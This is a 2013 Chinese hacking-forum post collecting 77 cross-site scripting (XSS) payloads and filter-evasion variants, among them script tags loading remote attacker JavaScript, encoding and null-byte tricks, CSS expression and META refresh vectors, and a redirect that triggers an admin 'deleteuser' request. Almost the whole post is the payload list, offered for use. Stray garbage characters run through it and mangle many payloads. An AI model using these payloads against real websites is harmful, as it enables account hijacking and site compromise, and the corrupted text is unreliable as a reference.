找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2870|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。- z. {' b& C. [9 }7 w& H
(1)普通的XSS JavaScript注入
' n8 X$ D( `) k' I+ a' @0 F/ K9 H<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ D6 B: `2 }& b' z3 g! e: Y(2)IMG标签XSS使用JavaScript命令
) k- M2 c3 O2 A4 j<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" n; h: a& ]/ x- ]8 N$ Q& X(3)IMG标签无分号无引号5 V0 N2 ~8 n9 {" ~! Y  ]
<IMG SRC=javascript:alert(‘XSS’)>
* }; H/ V" f3 g0 k9 I(4)IMG标签大小写不敏感
& T, ^/ L/ l) O8 c' P1 X  [8 C<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: _) I9 K6 P* }# y5 i- ~(5)HTML编码(必须有分号)
( S* U) b3 X. L% j0 b<IMG SRC=javascript:alert(“XSS”)>
5 t( R2 c" a. e. k(6)修正缺陷IMG标签1 e1 o6 s5 z% u+ w
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
  [) F- `1 v& x1 u9 h3 Z& n' N/ g, D7 ]+ {
! P; Y; v. q6 h
(7)formCharCode标签(计算器)( X2 O, h: y/ z& W. c1 q# S
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" s4 T* w9 [# G! K1 F4 y
(8)UTF-8的Unicode编码(计算器)6 ^0 c" }( K9 {) G+ G2 X. A
<IMG SRC=jav..省略..S')>
5 n( S* u% f8 q, h; H( |(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 W- t, Z; V" h, [<IMG SRC=jav..省略..S')>. }+ B; s7 H1 \
(10)十六进制编码也是没有分号(计算器)# V# y: \7 X0 l
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>* k- {$ R$ D: F2 Z5 X: v* W
(11)嵌入式标签,将Javascript分开$ E% G. m* O. e! J' N7 g6 r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
& O! W& K  S4 F1 N(12)嵌入式编码标签,将Javascript分开
1 j0 C; Y2 J, u0 q<IMG SRC=”jav ascript:alert(‘XSS’);”>
* v6 `4 o0 _/ W: k" ?0 Z(13)嵌入式换行符6 ^- h. J- i  {. V3 F/ f6 a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( W8 S6 _# c9 H& E5 s8 ]4 ](14)嵌入式回车9 Y2 V1 W- c: ?! ^" Z$ D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# r5 Y, Y; U7 ?* }# g& n(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ A$ |% F/ f$ G3 n2 t  e
<IMG SRC=”javascript:alert(‘XSS‘)”>( y3 y2 |1 I# R! m4 w
(16)解决限制字符(要求同页面)# V, ~1 ?( \9 n5 ~! {/ l5 F9 t1 y
<script>z=’document.’</script>) u$ x; X3 n9 z; ~- H& y8 Z" t: ~
<script>z=z+’write(“‘</script>* |3 m$ ^1 p3 r9 B) B3 J; P
<script>z=z+’<script’</script>
. _: Q5 e! I! A8 }* O<script>z=z+’ src=ht’</script>' p: I* r5 q6 e6 x+ m8 }
<script>z=z+’tp://ww’</script>
0 |8 X3 S; h% ]2 q<script>z=z+’w.shell’</script>4 {; [$ S9 W! K7 y3 L" n1 w+ g& B2 w& \
<script>z=z+’.net/1.’</script>! ^% B$ O$ k& n0 }6 B' A; M
<script>z=z+’js></sc’</script>
  w' B. _* {  l; u: m# m' A<script>z=z+’ript>”)’</script>4 Z6 ?3 E6 \& X
<script>eval_r(z)</script>, i0 H) i3 w2 z1 o- X+ S" e3 H3 d
(17)空字符12-7-1 T00LS - Powered by Discuz! Board9 A1 o) Z, \' w% P! n1 K1 G
https://www.t00ls.net/viewthread ... table&tid=15267 2/63 c; m: r) @! Y& K" D
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 ^: L$ h  s' N3 ^  Q7 h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) r8 y  m( v# k/ N! t& q( z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, x, a1 B: Q4 f' q  z+ g(19)Spaces和meta前的IMG标签
6 r3 m. u3 b8 |% X* {7 Y: n<IMG SRC=” javascript:alert(‘XSS’);”>
/ D9 d& F0 S4 P5 y" W* K* O! Y9 P(20)Non-alpha-non-digit XSS, ?2 G; f+ n- U. i# D$ R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; g4 k7 D' E9 P8 ~) x, i+ I(21)Non-alpha-non-digit XSS to 23 A: \, \, _. I1 t
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 D# O6 o" z9 e
(22)Non-alpha-non-digit XSS to 3
9 p9 U2 y1 k0 D2 |<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) {5 t- S) }5 F(23)双开括号) J7 J5 y- |% E0 ~5 K
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
6 e: }' E5 @3 E) k(24)无结束脚本标记(仅火狐等浏览器)
8 g( w/ Y- A- W' M: b8 T* C4 K8 f- g. s<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% V( ^1 x, A; q0 ?9 Z2 Y7 S(25)无结束脚本标记2& ~: Y/ v4 W& u. U. D& P
<SCRIPT SRC=//3w.org/XSS/xss.js>0 b' K! q/ t9 ~7 ?9 }- `
(26)半开的HTML/JavaScript XSS# H  ?& t1 x1 K- S+ i2 W
<IMG SRC=”javascript:alert(‘XSS’)”2 Q: T. h. \3 r* e- z
(27)双开角括号
- K5 w& R0 K* f" X& d! q- ?2 m3 e<iframe src=http://3w.org/XSS.html <9 P+ \$ F9 r4 }* L. [' I2 y
(28)无单引号 双引号 分号
2 L* R5 S5 N1 t! d# W, N<SCRIPT>a=/XSS/
0 s+ C* P4 n3 q# i  d! K6 ~2 calert(a.source)</SCRIPT>. J! L# V: M- d6 ]8 I6 j) q6 f
(29)换码过滤的JavaScript
) t! C9 R2 x! X3 t0 D\”;alert(‘XSS’);//
1 s: C1 r# Z# \' C4 j- r(30)结束Title标签
& `3 L. l8 B  ?, N. c</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>2 m, j, R2 ^; X5 l. r3 `
(31)Input Image5 U/ G, e, e5 _  h  k/ ]$ K
<INPUT SRC=”javascript:alert(‘XSS’);”>
& n7 N2 H9 E' u. I; ~/ V(32)BODY Image/ u& _1 @+ l  y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>% \0 F0 P. {+ ~; R
(33)BODY标签0 L0 p3 m( R: h6 Y
<BODY(‘XSS’)>
% k0 c% V( \, w, \(34)IMG Dynsrc7 [" x, L7 }! f; }' j% v. Y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 n) `& h, n, q% x1 D
(35)IMG Lowsrc
5 h& `! c+ ?; P# a. ?) O; }<IMG LOWSRC=”javascript:alert(‘XSS’)”>; _% k5 K3 |  X# p7 K# @5 }
(36)BGSOUND
$ {& x0 h4 r1 F( n: ]. M. E<BGSOUND SRC=”javascript:alert(‘XSS’);”>" Z, e9 A" {7 U2 i
(37)STYLE sheet
" F, Q  R. F1 [7 H! V* c<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 V) \" U; g+ ~- o: h(38)远程样式表* \% i8 A! g5 M# h7 [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>+ Z$ H4 h5 i, l% F( \0 e, L& l# i
(39)List-style-image(列表式)
3 F) G& v/ n" U% U0 |0 _1 N<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS! d, F2 F4 {0 z) R6 Y1 `# E6 S' }
(40)IMG VBscript
; A' r) @6 M9 s& x+ J<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 z1 @+ k- X3 n9 D3 f7 C9 J9 n
(41)META链接url7 K! Z7 m4 I: ?, D. e, b
$ I% a$ X5 H" ^/ |* {

3 U" Z2 o8 K9 ]* N! s+ g<META HTTP-EQUIV=”refresh” CONTENT=”0;# i1 T: x! g) j7 Y; ^3 _
URL=http://;URL=javascript:alert(‘XSS’);”>% `: u+ D0 \$ t
(42)Iframe
0 G. C6 p$ k9 u* L<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>: S/ s7 r; M) c- _; ~9 u" m
(43)Frame1 W; M! F- {* Q* c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board* O" g8 q  W$ o
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
5 a. v! F& k+ K1 R(44)Table1 m8 F. h( a; ~2 d1 Y" Z
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* i4 U& @' o4 U0 W) `! h(45)TD  ]2 f, J( U9 L. \8 g
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>2 j3 l  W9 o0 U5 b
(46)DIV background-image
/ I$ z( `3 Q  |! u& n7 \$ Y( s<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 G0 z7 H1 n8 o) v& B+ h8 u! \7 z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-$ N, v0 d6 ^5 k7 X7 \) N% K( k, Y( m& k
8&13&12288&65279)
# t) d" L: n' S1 o<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: M6 w. B' V0 u
(48)DIV expression
  h) T/ G  }% I% L+ r3 K6 l; y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. E. x1 i  }) b" U
(49)STYLE属性分拆表达2 ~  L8 C1 d  T- }2 c" n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( B& }4 I- t, v; N
(50)匿名STYLE(组成:开角号和一个字母开头)1 }  V2 R- b4 @, A/ k
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ g( F5 w0 k7 D8 H2 j(51)STYLE background-image
0 y3 t- J# z' K) Q<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A; q" L+ ?* j; |& q0 j9 U5 G( \7 s
CLASS=XSS></A>
5 u" X& s  t2 u: b  @* d; r(52)IMG STYLE方式
! ]- G( F3 r0 J2 D& |# \4 Eexppression(alert(“XSS”))’>8 T4 T7 u$ ^, J
(53)STYLE background
9 P% {4 w; P. ~4 {; M<STYLE><STYLE2 ~! b( w0 o" x
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
/ e* i! A, ?, q/ p7 ]! \(54)BASE
0 u2 f& p0 Q2 c! q2 h2 @<BASE HREF=”javascript:alert(‘XSS’);//”>* L- |" D# o; c  D* G: {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! k* n0 x0 y7 B- \+ e<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
/ o/ F) |& ^& Y. R  n& a- `(56)在flash中使用ActionScrpt可以混进你XSS的代码
2 p0 i5 ~8 i8 Ba=”get”;
/ {0 N7 w. T# Q- f2 M" Z6 Bb=”URL(\”";
2 G/ y- q, t9 Yc=”javascript:”;0 ], N/ e# D7 G
d=”alert(‘XSS’);\”)”;
! l# M# N2 X4 ~7 j. K' \eval_r(a+b+c+d);
" i; N( o$ G! ~) ~' ?) j(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) A: u- S& x6 i' A<HTML xmlns:xss>
7 p2 @; o& O7 {& C2 M<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! [3 e1 t  n# s' A, K/ p+ ?$ _<xss:xss>XSS</xss:xss>% C2 O9 L3 ]$ g* X. n" @8 S+ H1 e; A
</HTML>6 F. h' V) _, O. e: \
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. z) |# y8 J" d1 b! V/ s( Z<SCRIPT SRC=””></SCRIPT>
8 n* F% P) Z0 W1 f" E! C(59)IMG嵌入式命令,可执行任意命令/ I4 c# s/ g/ m5 D* ~
<IMG SRC=”http://www.XXX.com/a.php?a=b”>  X  m5 S. ]# X2 ]0 \/ @1 F; b
(60)IMG嵌入式命令(a.jpg在同服务器)0 H- I$ f; t: o. Y, \. ?
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. ^, F8 Z, z' W# f" ^/ f
(61)绕符号过滤
7 v. X: d! O7 s; \; v<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 f3 h9 m* G8 ~(62)+ |; o9 i% t  p' ?
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 W: e, t% I2 _' f( l5 A! c# w' n
(63)
" v1 M! X) v. k/ Y  f) z% w<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 e% j: x+ W; K4 j7 I5 N(64)
  r' j7 s4 [1 I& b) X! `  C( v0 t<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
' S7 o8 [- G8 ~(65)1 C+ }6 X9 z) B+ [- S
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 e& C/ ^3 f* B/ o; C
(66)12-7-1 T00LS - Powered by Discuz! Board
# W; w3 n5 m- Z2 ghttps://www.t00ls.net/viewthread ... table&tid=15267 4/6- D3 x+ Q' `6 h( p2 Y+ _
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( o6 ?6 A! @0 |
(67)3 z* Y5 V' M! N8 d5 T0 n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>1 u$ s" S! Y2 A! U" V
</SCRIPT>
* j7 S1 S+ n4 o. {! m5 Z(68)URL绕行. U4 d1 a* u& X( E
<A HREF=”http://127.0.0.1/”>XSS</A>
, v( ^8 @9 `  ~(69)URL编码
& s7 e) W" J5 ^/ b* ~<A HREF=”http://3w.org”>XSS</A>
' y  u! R8 M3 h5 Z* W+ i: |; E5 S(70)IP十进制
' l6 n/ C5 b, @<A HREF=”http://3232235521″>XSS</A>
. i3 J2 c/ P% d' l. Z. Q, ](71)IP十六进制9 L# V1 F9 U2 S) b+ G8 B
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 x! i3 k# B6 E& O
(72)IP八进制/ H4 T! J% L0 f  V- E: L/ P0 x$ A) H
<A HREF=”http://0300.0250.0000.0001″>XSS</A>. }. x) d" L. c* U" B8 q
(73)混合编码
7 P# o; o$ c' q# j9 H  R$ _<A HREF=”h
. ]; J( O2 |# t% Y4 Gtt p://6 6.000146.0×7.147/”">XSS</A>3 u$ i( [* e: O* i" y- S
(74)节省[http:]
, O* x" W1 u! X7 h6 O<A HREF=”//www.google.com/”>XSS</A>2 Q' G1 Q, d& w! _& ]( X* x- Z1 I4 n
(75)节省[www]
/ a, w8 f1 U& L. h<A HREF=”http://google.com/”>XSS</A>
- g$ e9 A6 t; n4 e(76)绝对点绝对DNS: |" C  s6 X- r1 N
<A HREF=”http://www.google.com./”>XSS</A>
0 |* K% }0 K; x+ U( V9 I. K(77)javascript链接
% l/ m) M4 L$ p2 G<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>7 J& [, @+ g1 H3 F9 E/ O1 P, s, T  C! I
( q/ T( U' _- l, J' `" B- o
原文地址:http://fuzzexp.org/u/0day/?p=14
( z! u- I. O: o  ]) M( y$ h0 L
( f- `8 |7 H8 k9 Z- e: ?0 Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表